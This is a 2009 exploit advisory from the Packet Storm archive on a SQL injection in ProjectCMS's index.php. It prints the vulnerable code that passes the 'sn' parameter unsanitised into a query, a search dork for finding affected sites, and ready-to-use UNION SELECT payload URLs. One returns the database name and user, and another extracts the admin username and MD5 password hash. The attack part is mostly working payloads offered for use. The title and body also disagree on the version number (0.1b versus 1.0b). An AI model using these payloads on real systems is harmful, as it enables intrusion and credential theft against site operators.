what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ProjectCMS 0.1b SQL Injection

ProjectCMS 0.1b SQL Injection
Posted Apr 29, 2009
Authored by YEnH4ckEr

ProjectCMS version 1.0b suffers from a remote SQL injection vulnerability in index.php.

tags | exploit, remote, php, sql injection
SHA-256 | 6b3590c0ce7aa31f3c3c8f0b97189e81616824240802c68ea371becce8e5f3f6
Download | Favorite | View

ProjectCMS 0.1b SQL Injection

Change Mirror Download
***********************************************************************************************
***********************************************************************************************
**                                  **
**                             **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []   []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**                                                   **
**                               **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**          ¡PROUD TO BE SPANISH!             **
**                           **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|                    SQL INJECTION (SQLi) VULNERABILITY                     |
|--------------------------------------------------------------------------------------------|
|                           |  ProjectCMS v1.0 Beta Final  |            |
|  CMS INFORMATION:     ------------------------------                   |
|                                 |
|-->WEB: http://projectcms.org/                                |
|-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip                         |
|-->DEMO: http://projectcms.org                     |
|-->CATEGORY: CMS / Portal                     |
|-->DESCRIPTION: ProjectCMS is an open source community project to create                 |
|    a simple content management system with an easy to follow install...         |
|-->RELEASED: 2009-04-29                     |
|                           |
|  CMS VULNERABILITY:                       |
|                           |
|-->TESTED ON: firefox 3                                 |
|-->DORK: "Powered by ProjectCMS"                   |
|-->CATEGORY: SQL INJECTION VULNERABILITY                       |
|-->AFFECT VERSION: 1.0 Beta Final (maybe <= ?)                  |
|-->Discovered Bug date: 2009-04-29                   |
|-->Reported Bug date: 2009-04-29                   |
|-->Fixed bug date: N/A                             |
|-->Info patch:  N/A                             |
|-->Author: YEnH4ckEr                       |
|-->mail: y3nh4ck3r[at]gmail[dot]com                   |
|-->WEB/BLOG: N/A                       |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)           |
----------------------------------------------------------------------------------------------


#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-----------
VULN FILE:
-----------


  ...

  $sn=$_GET["sn"];
      
  if ( $sn == "" ) {
        
    $sn = "1";
  }
        
  $sql="select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn='$sn'";
      
  $result=mysql_query($sql,$connection) or die(mysql_error());

  ...


------------------
PROOF OF CONCEPT:
------------------


http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/*


Return --> user and database, this last in title ;)


----------
EXPLOIT:
----------


http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/*


Return --> username:::password (md5 hash) of admin and database (in title too).




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##        GREETZ TO: JosS and all SPANISH Hack3Rs community!         ##
##*******************************************************************##
#######################################################################
#######################################################################

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close